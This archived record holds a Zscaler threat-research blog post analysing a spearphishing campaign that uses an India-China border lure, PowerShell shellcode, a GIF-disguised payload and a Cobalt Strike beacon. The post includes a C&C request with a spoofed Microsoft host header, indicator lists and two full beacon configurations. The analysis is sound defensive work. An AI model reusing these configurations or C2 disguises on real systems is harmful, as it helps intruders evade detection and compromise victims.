{ "id": "b13879c7-8a34-4da7-a93a-37bf446dc25c", "created_at": "2026-04-06T00:17:27.844704Z", "updated_at": "2026-04-10T03:38:09.861857Z", "deleted_at": null, "sha1_hash": "2be31dcf1ff921f838b40e106486ec12bb0bc3ff", "title": "Targeted Attack Leverages India-China Border Dispute", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1025978, "plain_text": "Targeted Attack Leverages India-China Border Dispute\r\nBy Atinderpal Singh, Nirmal Singh, Sahil Antil\r\nPublished: 2020-06-19 · Archived: 2026-04-05 14:06:15 UTC\r\nMalicious threat actors are always ready to take advantage of current affairs to maximize the success rate of their attacks.\r\nThe Zscaler ThreatLabZ team recently came across one such attack trying to leverage the current India-China border dispute\r\nto lure victims to open an attached malicious document.\r\nKey points\r\nThe attack is fileless as no payload is written on disk and no persistence is created. \r\nThe shellcode uses a fake HTTP host field while communicating with the command and control (C\u0026C) server to\r\ndownload the shellcode.\r\nIt uses the DKMC framework to hide communication in plain sight using steganography.\r\nIt relies on the Cobalt Strike beacon using a malleable C\u0026C profile.\r\nInfection\r\nIt appears as if victims were sent a malicious lure document as an email attachment. The document is named “India-China\r\nborder tensions.doc” and contains an article by The Times of India article about the same topic. \r\nFigure 1: The infection flow of this attack.\r\nDocument\r\nThe document contains one line that reads “Geostrategic article for SE Asia Security Analyst,” indicating that the target\r\nmight be a security analyst for southeast Asia.\r\nFigure 2: The malicious document containing a new article reference. \r\nInterestingly, the document contained corrupted macro code leading us to believe that it was built in a hurry using some\r\nautomated macro obfuscation tool without proper testing.\r\nThough the macro is corrupt, we were able to extract the PowerShell command using static analysis. The code obfuscation is\r\nvery basic. It just subtracts value 4 to decrypt the PowerShell command. \r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 1 of 8\n\nFigure 3: The macro command decryption function.\r\nPart of the PowerShell command after the base64 decoding looks like this:\r\nFigure 4: Part of the PowerShell code designed to run shellcode.\r\nAlmost exact code from the DKMC framework is used to run embedded base64 encoded shellcode. The PowerShell script is\r\ndesigned to run the shellcode in 32-bit mode only. It checks if the PowerShell script is running with a 64-bit PowerShell\r\nprocess using the command int pointer size, which will be 8 bytes [64bits] on a 64-bit process. If that is the case, then it\r\ntries to run the PowerShell in 32-bit mode with the shellcode injection script code as an argument.\r\nInjected shellcode \r\nThis shellcode on execution downloads another shellcode but with a valid GIF header, again borrowing a technique from\r\nDKMC. Interestingly, this shellcode uses a fake HTML host header and a predefined User-Agent field, in this case, to\r\ndownload a GIF payload from the C\u0026C IP over HTTPS.\r\nFigure 5: The shellcode starting with well-known module list access instructions.\r\nC\u0026C IP: 47.240.73.77\r\nRequest example:\r\nGET /avatar_32px.jpg HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: update.windows.microsoft.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nDownloaded payload\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 2 of 8\n\nThis GIF file, just after the GIF magic bytes [“GIF89a” in this case, which is also a valid assembly instruction] contains a\r\nshellcode followed by an XOR-encrypted payload. The shellcode decrypts and executes this payload, which turns out to be a\r\nCobalt Strike beacon. \r\nFigure 6: The shellcode and payload before decryption.\r\nFigure 7: The shellcode and payload after decryption.\r\nThe beacon is configured to point to the following C\u0026C address “userimage8.360doc.com,/s/ref=nb_sb_noss_1/167-\r\n3294888-0262949/field-keywords=books”  and the same host field and user agent.\r\nIn another instance, we found a .NET payload, which injects an RSA-encrypted payload into a notepad.exe file after\r\ndecryption with the MD5: 9c2ee383d235a702c5ad70b1444efb4d\r\nIn this case, the beacon payload is downloaded from https://114.67.110[.]37/QBah. The shellcode and additional payload are\r\nsimilar except for the C\u0026C addresses. Noticeably, both beacon DLLs use a 360doc.com-based C\u0026C, and the watermark is\r\nexactly the same in both: 305419896.\r\nAs Cobalt Strike is a well-known commercial tool for red teams, we are not getting into its technical details.\r\nAttribution\r\nAs of now, we are not able to attribute this attack to a specific actor with enough confidence. But here are few\r\nobservations. The group OceanLotus is known to use DKMC, Cobalt Strike, and fileless payloads. But the use of a proper\r\nGIF header for shellcode seems to be new for them. On the other hand, the watermark value (305419896) found in the\r\nbeacon configuration has also been used by the Trickbot Group. \r\nZscaler Cloud Sandbox report\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 3 of 8\n\nFigure 8: The Zscaler Cloud Sandbox report for this malware.\r\nNote: The document will crash in this case but if fixed to run, the Zscaler Cloud Sandbox will block its activity.\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. Check\r\nout our Threat Library for more details about Win32.Backdoor.CobaltStrike.\r\nConclusion\r\nThreat actors always try to find ways to blend into real traffic. In this case. they are using an SSL/TLS connection and a host\r\nheader set to a legitimate Microsoft website. One such evasion trick that we covered in our earlier blog was the use of\r\nFakeTLS header.\r\nThe Zscaler ThreatLabZ team is continuously monitoring threat actors and ensuring protection against such threats. \r\nAcknowledgment\r\nThanks to Adtiya Sharma for providing support in the research.\r\nMITRE ATT\u0026CK TTP Mapping\r\nID Technique Description\r\nT1193 Spearphishing Attachment Document is delivered as an email attachment\r\nT1086 PowerShell Uses PowerShell to run shellcode\r\nT1204 User Execution Uses doc attachment requiring user interaction\r\nT1140 Deobfuscate/Decode Files or Information Decrypt payloads during execution\r\nT1027 Obfuscated Files or Information Uses encrypted payloads\r\nT1036 Masquerading Uses fake GIF header magic bytes and filename\r\nT1043 Commonly Used Port 443\r\nT1008 Fallback Channels Uses more than one C\u0026C \r\nT1071 Standard Application Layer Protocol Uses HTTPs\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 4 of 8\n\nNote: The TTP list above contains TTP observed during the campaign as a Cobalt Strike beacon has many more features. A\r\ncomplete list of techniques can be found here.\r\nIOCs\r\nHashes\r\ndb89750a7fab01f50b1eefaf83a00060\r\nbd665cd2c7468002f863558dbe110467\r\nd8aa162bc3e178558c8829df189bff88\r\n9c2ee383d235a702c5ad70b1444efb4d\r\n6208516f759accb98f967ff1369c2f72\r\n9632bec3bf5caa71d091f08d6701d5d8\r\na7662d43bb06f31d2152c4f0af039b6e\r\n5cd9b0858b48d87b9622da8170ce8e5d\r\nNetwork IOCs\r\n47.240.73[.]77\r\n114.67.110[.]37\r\nuserimage8.360doc[.]com\r\nimage91.360doc[.]com\r\nwelcome.toutiao[.]com\r\nAppendix\r\nBeacon Config [9632bec3bf5caa71d091f08d6701d5d8]:\r\n{\r\n    \"BeaconType\": [\r\n        \"HTTPS\"\r\n    ],\r\n    \"Port\": 443,\r\n    \"SleepTime\": 2000,\r\n    \"MaxGetSize\": 1048576,\r\n    \"Jitter\": 30,\r\n    \"MaxDNS\": 255,\r\n    \"PublicKey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqkaeSkv+M5R/uTJPUwinLLSQ2X8C/vPURmKkkDXjabFDduIL3hsJ16AWuCdTswnKts0\r\n    \"C2Server\": \"userimage8.360doc.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\",\r\n    \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n    \"HttpPostUri\": \"/N4215/adj/aliyun.cn.sr.aps\",\r\n    \"HttpGet_Metadata\": [\r\n        \"Accept: */*\",\r\n        \"Host: update.windows.microsoft.com\",\r\n        \"session-token=\",\r\n        \"skin=noskin;\",\r\n        \"csm-hit=s-24KU11BB82RZSYGJ3BDK|1585758520\",\r\n        \"Cookie\"\r\n    ],\r\n    \"HttpPost_Metadata\": [\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 5 of 8\n\n\"Accept: */*\",\r\n        \"Content-Type: text/xml\",\r\n        \"X-Requested-With: XMLHttpRequest\",\r\n        \"Host: weathers.bing.com\",\r\n        \"sz=160x600\",\r\n        \"oe=oe=ISO-8859-1;\",\r\n        \"sn\"\r\n    ],\r\n    \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n    \"PipeName\": \"\",\r\n    \"DNS_Idle\": \"0.0.0.0\",\r\n    \"DNS_Sleep\": 0,\r\n    \"SSH_Host\": \"Not Found\",\r\n    \"SSH_Port\": \"Not Found\",\r\n    \"SSH_Username\": \"Not Found\",\r\n    \"SSH_Password_Plaintext\": \"Not Found\",\r\n    \"SSH_Password_Pubkey\": \"Not Found\",\r\n    \"HttpGet_Verb\": \"GET\",\r\n    \"HttpPost_Verb\": \"POST\",\r\n    \"HttpPostChunk\": 0,\r\n    \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n    \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n    \"CryptoScheme\": 0,\r\n    \"Proxy_Config\": \"Not Found\",\r\n    \"Proxy_User\": \"Not Found\",\r\n    \"Proxy_Password\": \"Not Found\",\r\n    \"Proxy_Behavior\": \"Use IE settings\",\r\n    \"Watermark\": 305419896,\r\n    \"bStageCleanup\": \"False\",\r\n    \"bCFGCaution\": \"False\",\r\n    \"KillDate\": 0,\r\n    \"bProcInject_StartRWX\": \"True\",\r\n    \"bProcInject_UseRWX\": \"True\",\r\n    \"bProcInject_MinAllocSize\": 0,\r\n    \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n    \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n    \"ProcInject_Execute\": [\r\n        \"CreateThread\",\r\n        \"SetThreadContext\",\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 6 of 8\n\n\"CreateRemoteThread\",\r\n        \"RtlCreateUserThread\"\r\n    ],\r\n    \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n    \"bUsesCookies\": \"True\",\r\n    \"HostHeader\": \"Host: update.windows.microsoft.com\\r\\n\"\r\n}\r\nBeacon Config[a7662d43bb06f31d2152c4f0af039b6e]:\r\n{\r\n    \"BeaconType\": [\r\n        \"HTTPS\"\r\n    ],\r\n    \"Port\": 443,\r\n    \"SleepTime\": 5000,\r\n    \"MaxGetSize\": 2097607,\r\n    \"Jitter\": 30,\r\n    \"MaxDNS\": 255,\r\n    \"PublicKey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDjGBTLCLwB7GPYyUi4sZYnhkQVCfDL4WwPx+YV4YziSbxIzrKAVpZTaiD8srY15L\r\n    \"C2Server\": \"welcome.toutiao.com,/s,image91.360doc.com,/s\",\r\n    \"UserAgent\": \"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\",\r\n    \"HttpPostUri\": \"/S\",\r\n    \"HttpGet_Metadata\": [\r\n        \"Host: image.tencent.com\",\r\n        \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n        \"Cookie: BAIDUID=NSAB29B2991BAA:FG=2\",\r\n        \"wd\",\r\n        \"ie=utf-8\"\r\n    ],\r\n    \"HttpPost_Metadata\": [\r\n        \"Host: image.tencent.com\",\r\n        \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n        \"Cookie: BAIDUID=NSAB29B2991BAA:FG=2\",\r\n        \"wd\",\r\n        \"ie\"\r\n    ],\r\n    \"SpawnTo\": \"nM+xbKt6yXlj++MYE0T3iQ==\",\r\n    \"PipeName\": \"\",\r\n    \"DNS_Idle\": \"0.0.0.0\",\r\n    \"DNS_Sleep\": 0,\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 7 of 8\n\n\"SSH_Host\": \"Not Found\",\r\n    \"SSH_Port\": \"Not Found\",\r\n    \"SSH_Username\": \"Not Found\",\r\n    \"SSH_Password_Plaintext\": \"Not Found\",\r\n    \"SSH_Password_Pubkey\": \"Not Found\",\r\n    \"HttpGet_Verb\": \"GET\",\r\n    \"HttpPost_Verb\": \"POST\",\r\n    \"HttpPostChunk\": 96,\r\n    \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n    \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n    \"CryptoScheme\": 0,\r\n    \"Proxy_Config\": \"Not Found\",\r\n    \"Proxy_User\": \"Not Found\",\r\n    \"Proxy_Password\": \"Not Found\",\r\n    \"Proxy_Behavior\": \"Use IE settings\",\r\n    \"Watermark\": 305419896,\r\n    \"bStageCleanup\": \"False\",\r\n    \"bCFGCaution\": \"False\",\r\n    \"KillDate\": 0,\r\n    \"bProcInject_StartRWX\": \"True\",\r\n    \"bProcInject_UseRWX\": \"True\",\r\n    \"bProcInject_MinAllocSize\": 0,\r\n    \"ProcInject_PrependAppend_x86\": \"Empty\",\r\n    \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n    \"ProcInject_Execute\": [\r\n        \"CreateThread\",\r\n        \"SetThreadContext\",\r\n        \"CreateRemoteThread\",\r\n        \"RtlCreateUserThread\"\r\n    ],\r\n    \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n    \"bUsesCookies\": \"True\",\r\n    \"HostHeader\": \"\"\r\n}\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nhttps://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims" ], "report_names": [ "targeted-attack-leverages-india-china-border-dispute-lure-victims" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434647, "ts_updated_at": 1775792289, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.pdf", "text": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.txt", "img": "https://archive.orkl.eu/2be31dcf1ff921f838b40e106486ec12bb0bc3ff.jpg" } }